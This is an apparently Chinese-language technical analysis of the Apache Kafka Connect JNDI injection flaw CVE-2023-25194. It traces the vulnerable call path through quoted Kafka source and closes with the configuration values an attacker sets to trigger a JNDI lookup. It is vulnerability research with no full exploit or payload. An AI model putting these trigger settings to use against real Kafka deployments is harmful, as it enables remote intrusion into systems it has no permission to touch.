Apache Kafka Connect JNDI 注入漏洞(CVE-2023-25194)分析
前言
Apache Kafka 是一种分布式流处理平台。它可以在分布式系统中可靠地发布和订阅流数据。 Kafka 用作实时数据流的中央数据管道,能有效地连接各种系统和应用。在Apache Kafka Connect中存在JNDI注入漏洞,当攻击者可访问Kafka Connect Worker,且可以创建或修改连接器时,通过设置sasl.jaas.config属性为com.sun.security.auth.module.JndiLoginModule,进而可导致JNDI注入
漏洞分析
调用KafkaProducer#KafkaProducer()
构造函数
然后调用他的重载方法
再调用重载方法
一共经历四次调用重载方法后,进入newSender()
跟进到ClientUtils#createChannelBuilder()
,这里的security.protocol
和sasl.mechanism
是我们传进去的,如果不手动指定,则会抛出null异常。
跟进到ChannelBuiders#cilentChannelBuilder()
,这里需要contextType
和clientSaslMechanism
不为空
调用ChannelBuilders#create()
private static ChannelBuilder create(SecurityProtocol securityProtocol, Mode mode, JaasContext.Type contextType, AbstractConfig config, ListenerName listenerName, boolean isInterBrokerListener, String clientSaslMechanism, boolean saslHandshakeRequestEnable, CredentialCache credentialCache, DelegationTokenCache tokenCache, Time time, LogContext logContext, Supplier<ApiVersionsResponse> apiVersionSupplier) {
Map<String, Object> configs = channelBuilderConfigs(config, listenerName);
Object channelBuilder;
switch (securityProtocol) {
case SSL:
requireNonNullMode(mode, securityProtocol);
channelBuilder = new SslChannelBuilder(mode, listenerName, isInterBrokerListener, logContext);
break;
case SASL_SSL:
case SASL_PLAINTEXT:
requireNonNullMode(mode, securityProtocol);
String sslClientAuthOverride = null;
Object jaasContexts;
if (mode != Mode.SERVER) {
JaasContext jaasContext = contextType == Type.CLIENT ? JaasContext.loadClientContext(configs) : JaasContext.loadServerContext(listenerName, clientSaslMechanism, configs);
jaasContexts = Collections.singletonMap(clientSaslMechanism, jaasContext);
} else {
List<String> enabledMechanisms = (List)configs.get("sasl.enabled.mechanisms");
jaasContexts = new HashMap(enabledMechanisms.size());
Iterator var18 = enabledMechanisms.iterator();
String listenerClientAuth;
while(var18.hasNext()) {
listenerClientAuth = (String)var18.next();
((Map)jaasContexts).put(listenerClientAuth, JaasContext.loadServerContext(listenerName, listenerClientAuth, configs));
}
if (listenerName != null && securityProtocol == SecurityProtocol.SASL_SSL) {
String configuredClientAuth = (String)configs.get("ssl.client.auth");
listenerClientAuth = (String)config.originalsWithPrefix(listenerName.configPrefix(), true).get("ssl.client.auth");
if (listenerClientAuth == null) {
sslClientAuthOverride = SslClientAuth.NONE.name().toLowerCase(Locale.ROOT);
if (configuredClientAuth != null && !configuredClientAuth.equalsIgnoreCase(SslClientAuth.NONE.name())) {
log.warn("Broker configuration '{}' is applied only to SSL listeners. Listener-prefixed configuration can be used to enable SSL client authentication for SASL_SSL listeners. In future releases, broker-wide option without listener prefix may be applied to SASL_SSL listeners as well. All configuration options intended for specific listeners should be listener-prefixed.", "ssl.client.auth");
}
}
}
}
channelBuilder = new SaslChannelBuilder(mode, (Map)jaasContexts, securityProtocol, listenerName, isInterBrokerListener, clientSaslMechanism, saslHandshakeRequestEnable, credentialCache, tokenCache, sslClientAuthOverride, time, logContext, apiVersionSupplier);
break;
case PLAINTEXT:
channelBuilder = new PlaintextChannelBuilder(listenerName);
break;
default:
throw new IllegalArgumentException("Unexpected securityProtocol " + securityProtocol);
}
((ChannelBuilder)channelBuilder).configure(configs);
return (ChannelBuilder)channelBuilder;
}
当security.protocol
值为SSL
时,channelBuilder
为SslChannelBuilder
类
当security.protocol
值为SASL、SASL_PLAINTEXT
时,channelBuilder
为SaslChannelBuilder
类
当security.protocol
值为PLAINTEXT
时,channelBuilder
为PlaintextChannelBuilder
类
若都不是,则抛出IllegalArgumentException
错误
这里基于config信息生成了JaasContext实例,然后SaslChannelBuilder对象
在实例化JaasContext的时候,会new JaasConfig(globalContextName, dynamicJaasConfig.value());
把sasl.jaas.config
中的字符串解析成AppConfigurationEntry
对象,其中包含loginModuleName
以及其他参数
跟进到SaslChannelBuilder#configure()
继续跟进到LoginManager#acquireLoginManger
public static LoginManager acquireLoginManager(JaasContext jaasContext, String saslMechanism, Class<? extends Login> defaultLoginClass, Map<String, ?> configs) throws LoginException {
Class<? extends Login> loginClass = configuredClassOrDefault(configs, jaasContext, saslMechanism, "sasl.login.class", defaultLoginClass);
Class<? extends AuthenticateCallbackHandler> defaultLoginCallbackHandlerClass = "OAUTHBEARER".equals(saslMechanism) ? OAuthBearerUnsecuredLoginCallbackHandler.class : AbstractLogin.DefaultLoginCallbackHandler.class;
Class<? extends AuthenticateCallbackHandler> loginCallbackClass = configuredClassOrDefault(configs, jaasContext, saslMechanism, "sasl.login.callback.handler.class", defaultLoginCallbackHandlerClass);
Class var7 = LoginManager.class;
synchronized(LoginManager.class) {
Password jaasConfigValue = jaasContext.dynamicJaasConfig();
LoginManager loginManager;
LoginMetadata loginMetadata;
if (jaasConfigValue != null) {
loginMetadata = new LoginMetadata(jaasConfigValue, loginClass, loginCallbackClass);
loginManager = (LoginManager)DYNAMIC_INSTANCES.get(loginMetadata);
if (loginManager == null) {
loginManager = new LoginManager(jaasContext, saslMechanism, configs, loginMetadata);
DYNAMIC_INSTANCES.put(loginMetadata, loginManager);
}
} else {
loginMetadata = new LoginMetadata(jaasContext.name(), loginClass, loginCallbackClass);
loginManager = (LoginManager)STATIC_INSTANCES.get(loginMetadata);
if (loginManager == null) {
loginManager = new LoginManager(jaasContext, saslMechanism, configs, loginMetadata);
STATIC_INSTANCES.put(loginMetadata, loginManager);
}
}
SecurityUtils.addConfiguredSecurityProviders(configs);
return loginManager.acquire();
}
}
跟进LoginManager的构造函数
调用KerberosLogin#login()
,调用父类的login
AbstractLogin#login()
,下面会new一个LoginContext
类,调用login
public LoginContext login() throws LoginException {
this.loginContext = new LoginContext(this.contextName, (Subject)null, this.loginCallbackHandler, this.configuration);
this.loginContext.login();
log.info("Successfully logged in.");
return this.loginContext;
}
经过一系列调用,最后走到LoginContext#incoke()
反射获取到com.sun.security.auth.module.JndiLoginModule
类,然后后面实例化了。
然后进入JndiLoginModule#login()
,其中userProvider和groupProvider都不能为null。
当useFirstPass=true或tryFirstPass=true时,进入到attemptAuthentication();
这里调用InitialContext#lookup
,触发JNDI注入
总结:当攻击者可以控制kafka-clients
连接时的属性:
security.protocol
设置为SASL_PLAINTEXT
或SASL_SSL
,并且指定sasl.mechanism
sasl.jaas.config
设置为com.sun.security.auth.module.JndiLoginModule
,且userProvider
以及groupProvider
都不为null
,并且设置了useFirstPass=true或tryFirstPass=true
此时kafka client
发起连接,就会发起JNDI连接,导致JDNI注入